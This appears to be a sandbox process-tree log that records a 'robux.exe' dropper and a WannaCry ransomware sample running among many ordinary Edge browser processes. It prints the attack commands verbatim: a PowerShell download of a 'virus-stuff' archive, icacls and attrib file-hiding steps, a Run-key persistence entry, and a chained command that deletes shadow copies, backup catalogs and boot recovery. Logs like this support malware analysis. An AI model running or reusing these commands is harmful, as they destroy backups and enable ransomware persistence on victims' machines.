C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:12⤵PID:5436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:12⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:12⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4100 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:12⤵PID:3932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:1448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3200 /prefetch:82⤵PID:4368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4980 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:12⤵PID:1764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4416 /prefetch:12⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1312 /prefetch:12⤵PID:556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:12⤵PID:1116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:12⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:12⤵PID:5588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6244 /prefetch:82⤵PID:5636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:12⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:12⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:12⤵PID:524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:12⤵PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:12⤵PID:5344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:12⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:12⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:12⤵PID:1252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:12⤵PID:4876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7708 /prefetch:12⤵PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:12⤵PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8176 /prefetch:12⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:12⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:12⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8024 /prefetch:82⤵PID:6020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:644
-
-
C:\Users\Admin\Downloads\robux.exe"C:\Users\Admin\Downloads\robux.exe"2⤵
- Executes dropped EXE
PID:1720 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4BA.tmp\E4CB.tmp\E4DB.bat C:\Users\Admin\Downloads\robux.exe"3⤵PID:5284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3336
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
PID:3820
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:12⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,4336381279773385226,13865238773492901917,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3348 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2940
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1232
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1036
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5240
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
PID:6052 -
C:\Windows\SysWOW64\attrib.exeattrib +h .2⤵
- Views/modifies file attributes
PID:2728
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4368
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 103881721304197.bat2⤵PID:3408
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE2⤵
- Views/modifies file attributes
PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:4856
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5460
-
-
-
C:\Windows\SysWOW64\cmd.exePID:1416
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:4604
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:5504
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4080
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcuvipyafvelmp658" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f2⤵PID:4276
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kcuvipyafvelmp658" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5180
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5240
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:4976
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:4332
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4556
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:1856
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5444
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3948
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:5812
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5464
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:704
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:392
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:5672
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:3336
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2136
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:2044
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:516
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5808
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:5592
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]2⤵
- Executes dropped EXE
PID:1512
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exetaskdl.exe2⤵
- Executes dropped EXE
PID:4280
-
-
